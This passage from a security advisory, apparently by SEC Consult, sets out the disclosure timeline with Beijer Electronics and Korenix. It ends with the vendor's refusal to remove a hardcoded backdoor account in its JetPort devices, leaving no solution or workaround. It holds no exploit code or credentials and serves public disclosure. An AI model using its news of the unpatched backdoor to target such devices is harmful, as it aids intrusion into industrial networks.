             disclosure by requesting email certificate or whether plaintext can be  
             used. Referred to the request to cs@beijerelectronics.com.  
             No answer.  
2020-11-11: Asked the representatives of Korenix and Beijer regarding the  
             status.  
             No answer.  
2020-11-25: Phone call with security manager of Beijer. Sent advisories via  
             encrypted archive to cs@beijerelectronics.com. Received  
             confirmation of advisory receipt. Security manager told us that he  
             can provide information regarding the timeline for the patches  
             within the next two weeks.  
2020-12-09: Asked for an update.  
2020-12-18: Call with security manager of Beijer. Vendor presented initial  
             analysis done by the affected companies.  
2021-03-21: Security manager invited SEC Consult to have a status meeting.  
2021-03-26: Agreed on an advisory split as other affected products will get  
             patched later.  
2021-04-12: Performed advisory split.  
2021-05-26: Meeting regarding advisory publication. Agreed to release this  
             advisory in Q4.  
2021-06-01: Released related advisory SA-20210601-0.

2021-06-24: Beijer Electronics contact informs us that he leaves the company  
             today. Refers us to new contact in CC.

2021-07-05: Follow-up meeting with new vendor contact regarding next steps.  
2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers  
             from Korenix are still investigating the issues. JetWave 2311 went  
             EoL, next status update in August 2021. JetPort will be fixed in  
             Q1 2022.  
2021-09-15: Asked for status update;  
2021-09-20: Korenix will provide a time schedule for the patches by end of next  
             week.  
2021-09-28: Meeting regarding the schedule. Fixes will be available by end of  
             the year for Korenix JetWave series.  
2021-09-28: Update call with vendor; Fixes will be available in November.  
2021-11-18: Contact had difficulties to get a response from Korenix. JetWave  
             2212G 1.8.0 has been released, other fixes will be released in  
             December.  
2021-11-22: Vendor provides all other fixed versions, which have already been  
             put online.  
2021-12-17: Performed another advisory split.  
2021-12-20: Update call with vendor. Identified another possibly affected  
             device (JetWave 3420). Investigation will be started from Korenix  
             as soon as possible.  
2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware.  
2022-01-17: Informed vendor about the advisory release within the next two  
             weeks.  
2022-01-19: Call with vendor; agreed that advisory can be published for  
             JetWave series.  
2022-01-24: Informed vendor about advisory release on 2022-01-31.  
2022-01-31: Released related advisory SA-20220131-0.  
2022-02-22: Vendor says, that fixes are estimated to be completed by end of  
             February.  
2022-03-29: Most issues from the related advisories (SA-20201005-0, SA-20210601-0)  
             are not applicable according to the vendor, only the backdoor account  
             exists in the JetPort series. The JetPort series will not go end of life.

             The backdoor is needed in order to assist customers with problems and  
             Korenix claims the password can't be cracked in a reasonable amount of time,  
             hence it will not be fixed.

             Security contact states that there is no point in waiting and we can  
             release the security advisory.

2022-04-05: Another call to clarify with security contact; Korenix will not remove  
             the account as this issue is not considered as critical.  
2022-05-18: Tried to re-send the advisory for final review which only contains the  
             backdoor account information. Received auto-reply that our contact from  
             Beijer Group (who did the coordination with Korenix) was no longer part  
             of the company.  
2022-05-31: Public release of security advisory.

Solution:  
---------  
None available. The vendor stated that they "will not remove the hardcoded backdoor  
account as it is needed for customer support and it can't be cracked in a reasonable  
amount of time."

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Thomas Weber / @2022

Tag

#backdoor